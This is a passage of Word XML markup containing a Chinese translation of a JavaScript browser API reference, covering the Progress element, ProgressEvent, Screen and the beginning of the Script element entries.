      <w:r>
        <w:t>元素，如果存在的话，这个</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>一般为当前元素的祖先，或者由</w:t>
      </w:r>
      <w:r>
        <w:t>HTML form</w:t>
      </w:r>
      <w:r>
        <w:t>属性标识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly NodeList labels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与当前元素关联的</w:t>
      </w:r>
      <w:r>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:t>元素组成的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double max</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要完成的工作的总数。比如，在使用</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>元素来显示一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的上传或下载进度时，可以将这个属性设置为要传输的总的字节数。这个属性是</w:t>
      </w:r>
      <w:r>
        <w:t>max</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly double position</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果这是一个进度可确定的</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>元素，这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>value/max</w:t>
      </w:r>
      <w:r>
        <w:t>的计算结果。否则，这个属性将是</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>max</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个值，标识已经完成的进度。这个属性是</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。如果存在这个属性，表示该</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>元素的进度可</w:t>
      </w:r>
      <w:r>
        <w:t>确定。如果它不存在，则表示该</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>元素的进度不可确定。如果想从进度可确定模式切换为进度不可确定模式（比如由于来自</w:t>
      </w:r>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
      <w:r>
        <w:t>的停滞事件），可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>removeAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="865" w:name="ProgressEvent"/>
      <w:r>
        <w:t>ProgressEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="865"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>下载、上传或文件读取进度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>以及（第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>级）</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象都会触发</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件，通知感兴趣的程序的数据传输过程的进度（比如，网络下载或上传或文件读取）。这类事件一般称为</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>rogress</w:t>
      </w:r>
      <w:r>
        <w:t>事件，但实际上只有一个这样的事件真的在名字里有</w:t>
      </w:r>
      <w:r>
        <w:t>"progress"</w:t>
      </w:r>
      <w:r>
        <w:t>。其他由</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>触发的</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件为</w:t>
      </w:r>
      <w:r>
        <w:t>loadstart</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>也会触发一个超时</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>会触发很多事件，但只有那个名为</w:t>
      </w:r>
      <w:r>
        <w:t>"progress"</w:t>
      </w:r>
      <w:r>
        <w:t>的事件是这儿描述的这类</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件依次触发，以</w:t>
      </w:r>
      <w:r>
        <w:t>loadstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件开始，并总是以</w:t>
      </w:r>
      <w:r>
        <w:t>loaden</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>事件结束。</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>之前的事件可能是</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>，取决于传送数据的操作是否成功，以及如果不成功的话是如何失败的。在开始的</w:t>
      </w:r>
      <w:r>
        <w:t>loadstart</w:t>
      </w:r>
      <w:r>
        <w:t>和最后的两个事件之间，可能会有</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个或多个进度事件（带有真实的事件名</w:t>
      </w:r>
      <w:r>
        <w:t>"progress"</w:t>
      </w:r>
      <w:r>
        <w:t>）触发。（</w:t>
      </w:r>
      <w:r>
        <w:t>ApplicationCache</w:t>
      </w:r>
      <w:r>
        <w:t>对象会触发一个不同的事件序列，但它作为它的缓存更新进程的一部分触发的进度事件是一个</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个定义了已传送了多少字节的数据的</w:t>
      </w:r>
      <w:r>
        <w:t>ProgressEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象将传入到</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件的事件处理程序中。</w:t>
      </w:r>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>ProgressEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象与</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>中描述过的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素没有关系，但传给</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>onprogress</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序（例如）的</w:t>
      </w:r>
      <w:r>
        <w:t>ProgressEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象可用来更新＜</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的状态，以便向用户显示可视化的下载完成百分比值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean lengthComputable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果要传送的字节的总数已知则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如果这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ProgressEvent </w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的数据传送完成百分比可以像这样计算：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var percentComplete=Math.floor(100*e.loaded/e.total);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long loaded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>到目前为止已传送了多少字节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long total</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果知道待传送的字节的总数，则返回为这个数字；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，这个信息可能来自</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>属性或者</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器返回的</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Length</w:t>
      </w:r>
      <w:r>
        <w:t>头信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="866" w:name="Screen"/>
      <w:r>
        <w:t>Screen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="866"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于显示屏的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:r>
        <w:t>reen</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代一个</w:t>
      </w:r>
      <w:r>
        <w:t>Screen</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这个全局对象（</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>）的</w:t>
      </w:r>
      <w:r>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:t>属性包含在其上显示对应浏览器的计算器显示器的信息。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可以根据这个信息来优化它们的输出，以便适应用户的显示功能。例如，一个程序可以根据显示尺寸，选择显示大图还是小图。</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availHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指明在其上显示网页浏览器的屏幕的可用高度，单位为像素。这个可用高度不包含垂直方向上显示固定的桌面功能的空间，比如在屏幕底部的工具栏或停靠栏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsi</w:t>
      </w:r>
      <w:r>
        <w:t>gned long availWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>指明在其上显示网页浏览器的屏幕的可用宽度，单位为像素。这个可用宽度不包含水平方向上显示固定的桌面功能的空间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long colorDepth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long pixelDepth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这两个同义属性都指定屏幕每像素的色彩深度的位。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long height</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指明在其上显示网页浏览器的屏幕的总高度，单位为像素。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>availHeight</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly </w:t>
      </w:r>
      <w:r>
        <w:t>unsigned long width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指明在其上显示网页浏览器的屏幕的总宽度，单位为像素。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>availWidth</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="867" w:name="Script"/>
      <w:r>
        <w:t>Script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="867"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</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lastRenderedPageBreak/>
        <w:t>Script</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。它的大多数属性只是同名的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的简单映射，不过</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>属性和继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>属性的工作原理类似。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞至多只运行一次。改变一个已存在的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>属性不会使它运行新的脚本。不过，可以通过在新创</w:t>
      </w:r>
      <w:r>
        <w:t>建的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上设置这些属性来执行一个脚本。还需要注意，＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签只有在插入一个</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>后才会运行。在</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>被设置或者当它插入到文档时执行脚本，这取决于哪个操作最后发生。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean async</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>属性则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.1</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string charset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>src URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的脚本的字符编码。通常不设置这个属性，默认使用包含的文档的相同编码来解析当前脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean defer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果＜</w:t>
      </w:r>
      <w:r>
        <w:t>scr</w:t>
      </w:r>
      <w:r>
        <w:t>ipt</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有</w:t>
      </w:r>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>属性则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.1</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string src</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要加载的脚本的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在＜</w:t>
      </w:r>
      <w:r>
